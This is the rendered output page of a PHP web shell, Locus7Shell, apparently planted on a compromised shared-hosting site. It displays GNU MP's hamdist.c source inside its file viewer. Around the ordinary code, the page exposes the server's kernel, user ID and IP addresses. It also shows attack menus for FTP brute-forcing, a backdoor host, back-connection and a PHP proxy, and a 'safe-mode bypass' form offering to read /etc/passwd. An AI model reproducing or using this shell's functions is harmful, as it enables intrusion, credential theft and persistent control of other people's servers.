Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gmp-6.2.1/mpz/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     hamdist.c (3.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* mpz_hamdist -- calculate hamming distance.

Copyright 1994, 1996, 2001, 2002, 2009-2011 Free Software Foundation, Inc.

This file is part of the GNU MP Library.

The GNU MP Library is free software; you can redistribute it and/or modify
it under the terms of either:

  * the GNU Lesser General Public License as published by the Free
    Software Foundation; either version 3 of the License, or (at your
    option) any later version.

or

  * the GNU General Public License as published by the Free Software
    Foundation; either version 2 of the License, or (at your option) any
    later version.

or both in parallel, as here.

The GNU MP Library is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License
for more details.

You should have received copies of the GNU General Public License and the
GNU Lesser General Public License along with the GNU MP Library.  If not,
see https://www.gnu.org/licenses/.  */

#include "gmp-impl.h"


mp_bitcnt_t
mpz_hamdist (mpz_srcptr u, mpz_srcptr v) __GMP_NOTHROW
{
  mp_srcptr      up, vp;
  mp_size_t      usize, vsize;
  mp_bitcnt_t    count;

  usize = SIZ(u);
  vsize = SIZ(v);

  up = PTR(u);
  vp = PTR(v);

  if (usize >= 0)
    {
      if (vsize < 0)
    return ~ (mp_bitcnt_t) 0;

      /* positive/positive */

      if (usize < vsize)
    MPN_SRCPTR_SWAP (up,usize, vp,vsize);

      count = 0;
      if (vsize != 0)
    count = mpn_hamdist (up, vp, vsize);

      usize -= vsize;
      if (usize != 0)
    count += mpn_popcount (up + vsize, usize);

      return count;
    }
  else
    {
      mp_limb_t  ulimb, vlimb;
      mp_size_t  old_vsize, step;

      if (vsize >= 0)
    return ~ (mp_bitcnt_t) 0;

      /* negative/negative */

      usize = -usize;
      vsize = -vsize;

      /* skip common low zeros */
      for (;;)
    {
      ASSERT (usize > 0);
      ASSERT (vsize > 0);

      usize--;
      vsize--;

      ulimb = *up++;
      vlimb = *vp++;

      if (ulimb != 0)
        break;

      if (vlimb != 0)
        {
          MPN_SRCPTR_SWAP (up,usize, vp,vsize);
          ulimb = vlimb;
          vlimb = 0;
          break;
        }
    }

      /* twos complement first non-zero limbs (ulimb is non-zero, but vlimb
     might be zero) */
      ulimb = -ulimb;
      vlimb = -vlimb;
      popc_limb (count, (ulimb ^ vlimb) & GMP_NUMB_MASK);

      if (vlimb == 0)
    {
      mp_bitcnt_t  twoscount;

      /* first non-zero of v */
      old_vsize = vsize;
      do
        {
          ASSERT (vsize > 0);
          vsize--;
          vlimb = *vp++;
        }
      while (vlimb == 0);

      /* part of u corresponding to skipped v zeros */
      step = old_vsize - vsize - 1;
      count += step * GMP_NUMB_BITS;
      step = MIN (step, usize);
      if (step != 0)
        {
          count -= mpn_popcount (up, step);
          usize -= step;
          up += step;
        }

      /* First non-zero vlimb as twos complement, xor with ones
         complement ulimb.  Note -v^(~0^u) == (v-1)^u. */
      vlimb--;
      if (usize != 0)
        {
          usize--;
          vlimb ^= *up++;
        }
      popc_limb (twoscount, vlimb);
      count += twoscount;
    }

      /* Overlapping part of u and v, if any.  Ones complement both, so just
     plain hamdist. */
      step = MIN (usize, vsize);
      if (step != 0)
    {
      count += mpn_hamdist (up, vp, step);
      usize -= step;
      vsize -= step;
      up += step;
      vp += step;
    }

      /* Remaining high part of u or v, if any, ones complement but xor
     against all ones in the other, so plain popcount. */
      if (usize != 0)
    {
    remaining:
      count += mpn_popcount (up, usize);
    }
      else if (vsize != 0)
    {
      up = vp;
      usize = vsize;
      goto remaining;
    }
      return count;
    }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0058 ]--